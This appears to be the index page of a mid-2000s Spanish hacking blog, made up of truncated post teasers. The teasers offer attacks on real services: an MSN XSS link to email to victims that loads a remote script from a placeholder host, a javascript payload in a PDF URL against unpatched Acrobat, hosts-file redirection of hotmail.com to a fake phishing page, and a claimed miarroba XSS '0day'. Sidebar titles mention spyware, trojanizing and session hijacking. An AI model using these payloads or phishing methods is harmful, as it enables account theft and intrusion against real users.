Antes funcionaba. Luego dejó de funcionar para después volver a funcionar. Hoy creo que no va (hace tiempo que no pruebo). Pero por si vuelve a funcionar en un futuro:
Para eliminar el baner publicitario que sale en los foros de miarroba habr [...]
Leer m�s ...
Bueno, pues resulta que por una historia muy larga andaba yo detrás de unos apuntes de Macroeconomía que sabía que estaban en el campus virtual de una Uni. Así las cosas,
1. LA PRIMERA OPORTUNIDAD QUE DESCARTAMOS:
Aunque e [...]
Leer m�s ...
Se trata simplemente de enviar por mail este enlace:
http://ie.search.msn.com/migrate.asp?SERVER=%3C/script%3E%20%22%3E%3Cscript%20src%3Dhttp%3A//tuweb.com/fuente.js%3E%3C/script%3E
Habiendo colgado previamente en http://tuweb.co [...]
Leer m�s ...
Mucha gente sigue sin actualizar su plugin de Acrobat Reader y continúa siendo vulnerable a un XSS tan simple como este:
http://website.com/archivo.pdf#FDF=javascript:alert('XSS')
Basta con que el dominio en el que queremos ejecu [...]
Leer m�s ...
En la línea del artículo Envenenamiento local de dominio, he hecho algunas mejoras en el código.
En primer lugar he [...]
Leer m�s ...
No tiene mucho que ver con la seguridad informática, pero bueno.
Resulta que ayer estaba haciendo una presentación en PowerPoint para mandársela a mis amigos y quería meterle musiquita.
Total, que lo hac&i [...]
Leer m�s ...
Bueno, en la línea del anterior artículo, aquí os pongo un código en C que modifica el archivo hosts asociando el dominio www.hotmail.com a la IP 83.00.000.000.
La idea sería montar la fake página en un servidor web en nuestro equipo. Mirar l [...]
Leer m�s ...
Si tienes acceso local a un equipo se puede hacer un phising muy sencillo pero efectista.
Primero crea la página falsa en un servidor web. Necesitas que no esté en un directorio, así que lo suyo sería montarlo en tu propio equipo. Imaginemos [...]
Leer m�s ...
Hace unos días una amiga me pidió que le echase un vistazo a la web de la empresa en la que trabaja (una multinacional norteamericana cuya identidad no revelaré) para ver si encontraba alguna vulnerabilidad.
Como de lo poco que sé un poquillo [...]
Leer m�s ...
Un par de curiosidades nada más. Y, naturalmente, no siempre funciona. No sé de qué depende.
Servidor web Apache:
Cita:
http://host/htdocs/manual/index.html
O bi [...]
Leer m�s ...
Se publicó el 25-12-05 en un full-disclosure, pero yahoo no se ha molestado en arreglarlo.
*17.01.06: Yahoo ya lo ha parcheado, pero sigue funcionando con correos de Terra, Eresmas y creo que también Wanadoo.
[...]
Leer m�s ...
Ok, esto es un 0day. No ha sido publicado en ningún sitio. Al menos yo lo he descubierto personalmente, no lo he visto por ningún lado.
En los foros de miarroba hay una vulnerabilidad de tipo cross-site scripting al postear. El problema se da [...]
Leer m�s ...
Redirección de url en login.yahooIE javaprxy.dll Command Execution ExploitCreando spywareURL spoofing mediante javascript avanzadoAutoarranque con WindowsTroyanizando un equipoOcultación avanzada de archivosCuriosidad criptográfica sobre los BMPsSecuestro de sesión en EresmasWebmail session hijacking en Hotmailseptiembre, 2007marzo, 2007julio, 2006mayo, 2006febrero, 2006enero, 2006agosto, 2005julio, 2005junio, 2005mayo, 2005abril, 2005
